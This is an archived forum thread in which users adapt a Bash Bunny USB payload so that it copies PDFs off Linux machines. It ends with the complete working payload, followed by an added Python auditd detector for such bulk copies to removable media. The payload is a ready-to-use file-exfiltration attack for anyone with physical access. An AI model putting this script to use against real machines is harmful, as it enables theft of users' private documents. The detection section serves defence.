Am3ience, posted February 28, 2018

Hey guys,

So there are a bunch of file exfiltration payloads for Windows on the git, but does anyone know of one for Linux? I'm trying to see if I can exfil all .docx or .pdf from a folder on Linux to the Bash Bunny.

Any help would be great, thanks!

C1PH3R, posted March 1, 2018

On 2/28/2018 at 7:29 AM, Am3ience said:
> Hey guys, So there are a bunch of file exfiltration payloads for Windows on the git, but does anyone know of one for Linux? I'm trying to see if I can exfil all .docx or .pdf from a folder on Linux to the Bash Bunny. Any help would be great, thanks!

Most Mac payloads will work because Mac uses Unix. So try to use a couple of those, maybe edit one or more lines and you will be set!

Am3ience (author), posted March 2, 2018

9 hours ago, C1PH3R said:
> Most Mac payloads will work because Mac uses Unix. So try to use a couple of those, maybe edit one or more lines and you will be set!

I'm looking at this really simple payload: https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/exfiltration/MacPDFExfil

What kind of things would I need to change for this to work for Linux?

C1PH3R, posted March 2, 2018

7 hours ago, Am3ience said:
> I'm looking at this really simple payload: https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/exfiltration/MacPDFExfil What kind of things would I need to change for this to work for Linux?

I will try to help, but note that I have not tested this yet.

You will probably need to change:

    line 19: QUACK CONTROL ALT t

That should work. If it doesn't, try to run the commands yourself and see what the error messages are.

bg-wa, posted March 2, 2018

Like @C1PH3R said, I'd probably replace Lines 19-22 with:

    RUN UNITY xterm

(for some reason I've had better luck executing commands in xterm than with terminal in Unity)

and you'll also need to change your loot_dir to something like:

    /media/$USER/BashBunny/loot/XYZ

then obviously 'killall xterm' instead of terminal.

** Also untested

C1PH3R, posted March 3, 2018

12 hours ago, bg-wa said:
> Like @C1PH3R said, I'd probably replace Lines 19-22 with: RUN UNITY xterm (for some reason I've had better luck executing commands in xterm than with terminal in Unity) and you'll also need to change your loot_dir to something like: /media/$USER/BashBunny/loot/XYZ then obviously 'killall xterm' instead of terminal. ** Also untested

Yeah, this could probably work!

Am3ience (author), posted March 4, 2018

Thanks guys! Managed to figure it out with your help. For future reference if anyone else stumbles upon this thread, below is the code to exfil PDFs from Fedora, but should work in all Linux distros.

    LED SETUP
    ATTACKMODE HID STORAGE
    LED ATTACK
    RUN UNITY xterm
    Q DELAY 1000
    Q STRING export lootdir=/run/media/\$USER/BashBunny/loot/LinuxGrabber
    Q ENTER
    Q STRING mkdir -p \$lootdir
    Q ENTER
    # Find all PDFs stored in the user's file structure, and copy them over to the BashBunny storage.
    Q STRING find . -name "*.pdf" -exec cp '{}' \$lootdir \\\;
    Q ENTER
    Q STRING killall xterm
    Q ENTER
    # sync the filesystem
    sync
    LED FINISH

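A defender's view of the payload above, as an added example that is not part of the thread: it parses auditd EXECVE records and flags a burst of `cp` commands writing .pdf or .docx files to a removable-media mount, which is what the `find ... -exec cp` line produces. The sample records, the threshold and the time window are constructed assumptions; it assumes an audit rule that logs execve is in place and handles only quoted (not hex-encoded) arguments.

```python
import re

# udisks2 mounts removable media under /run/media/<user>/ (Fedora) or /media/<user>/.
REMOVABLE = re.compile(r"^/(?:run/)?media/[^/]+/[^/]+")
DOC_EXT = (".pdf", ".docx")
EXECVE = re.compile(r"type=EXECVE msg=audit\((\d+)\.\d+:\d+\): argc=\d+ (.*)")
ARG = re.compile(r'a\d+="([^"]*)"')  # quoted args only; hex-encoded args are skipped

def parse_execve(line):
    """Return (epoch_seconds, argv) for an auditd EXECVE record, else None."""
    m = EXECVE.match(line)
    return (int(m.group(1)), ARG.findall(m.group(2))) if m else None

def copies_to_removable(argv):
    """True if argv is `cp <document...> <dest>` with dest on removable media."""
    if len(argv) < 3 or argv[0].rsplit("/", 1)[-1] != "cp":
        return False
    sources, dest = argv[1:-1], argv[-1]
    return bool(REMOVABLE.match(dest)) and any(
        s.lower().endswith(DOC_EXT) for s in sources)

def detect(lines, threshold=3, window=10):
    """Mount points that received >= threshold document copies within window seconds."""
    hits = {}
    for line in lines:
        rec = parse_execve(line)
        if rec and copies_to_removable(rec[1]):
            mount = REMOVABLE.match(rec[1][-1]).group(0)
            hits.setdefault(mount, []).append(rec[0])
    alerts = []
    for mount, times in hits.items():
        times.sort()
        if any(times[i + threshold - 1] - times[i] <= window
               for i in range(len(times) - threshold + 1)):
            alerts.append(mount)
    return sorted(alerts)

# Constructed sample records (not taken from a real host).
DEST = "/run/media/alice/BashBunny/loot/LinuxGrabber"
SAMPLE = [
    f'type=EXECVE msg=audit(1520150400.101:501): argc=3 a0="cp" a1="./Documents/q1.pdf" a2="{DEST}"',
    f'type=EXECVE msg=audit(1520150400.350:502): argc=3 a0="cp" a1="./Documents/q2.pdf" a2="{DEST}"',
    f'type=EXECVE msg=audit(1520150401.020:503): argc=3 a0="cp" a1="./thesis.pdf" a2="{DEST}"',
    'type=EXECVE msg=audit(1520150900.000:610): argc=3 a0="cp" a1="notes.pdf" a2="/home/alice/backup"',
    'type=EXECVE msg=audit(1520151000.000:611): argc=3 a0="cp" a1="photo.jpg" a2="/media/alice/USB1/"',
]

if __name__ == "__main__":
    print(detect(SAMPLE))
```

A single copy to a USB stick stays below the threshold; tune `threshold` and `window` to the volume of legitimate removable-media use on the host.
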
Archived
This topic is now archived and is closed to further replies.